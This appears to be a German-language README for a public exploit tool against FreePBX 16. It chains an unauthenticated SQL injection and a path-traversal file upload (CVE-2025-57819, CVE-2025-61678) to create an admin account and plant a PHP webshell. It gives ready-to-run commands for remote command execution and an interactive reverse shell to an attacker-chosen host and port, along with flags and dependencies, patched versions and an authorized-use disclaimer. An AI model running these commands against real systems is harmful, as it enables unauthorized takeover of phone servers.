
Unauthentifizierte SQL-Injection- und beliebige Datei-Upload-Exploit-Kette für FreePBX 16, die Remote-Code-Ausführung über die Erstellung eines Administrators und die Bereitstellung einer Webshell erreicht.
| CVE | Komponente | Auswirkung |
|---|
| CVE-2025-57819 | Endpunkt-Modul-Lader (brand-Parameter) | Unauthentifizierte gestapelte SQL-Injection |
| CVE-2025-61678 | Endpoint-Manager-Firmware-Uploader (fwbrand-Parameter) | Authentifizierter willkürlicher Datei-Upload (Path Traversal) |
ampusers-Tabelle INSERT-en.../../../var/www/html/<dir>-Traversal in fwbrand missbraucht, um eine PHP-Webshell in das Web-Root zu schreiben.FreePBX 16 (Endpoint-Modul vor 16.0.92). Auch in 17.0.6 gepatcht.
Auf eine behobene Version aktualisieren.
# single command
python3 exploit.py --rhost pbx.example.com --command "id"
# interactive reverse shell (auto-listener via pwntools)
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444
# plain HTTP / custom port
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a"
| Flag | Beschreibung |
|---|---|
--rhost | Ziel-Host (erforderlich) |
--rport | Ziel-Port (Standard 443) |
--http | HTTP anstelle von HTTPS verwenden |
--lhost / --lport | Reverse-Shell-Rückrufadresse |
--command | Einzelnen Befehl anstelle einer Shell ausführen |
pip install requests pwntools
Nur für autorisierte Sicherheitstests und Bildungszwecke. Verwenden Sie es ausschließlich auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Erlaubnis zum Testen haben. Der Autor übernimmt keine Haftung für Missbrauch.
FreePBX · FreePBX 16 · FreePBX 16.0.40.7 · Sangoma PBX · Asterisk · CVE-2025-57819 · CVE-2025-61678 · unauth. SQL-Injection · gestapelte Abfrage-Injection · Endpunkt-Modul · Endpoint Manager · authentifizierter Datei-Upload · Path Traversal · Remote-Code-Ausführung · RCE · PoC · Exploit · VoIP-Sicherheit
linkedin: ehxb · medium.com/@Ehxb · github 0xEhxb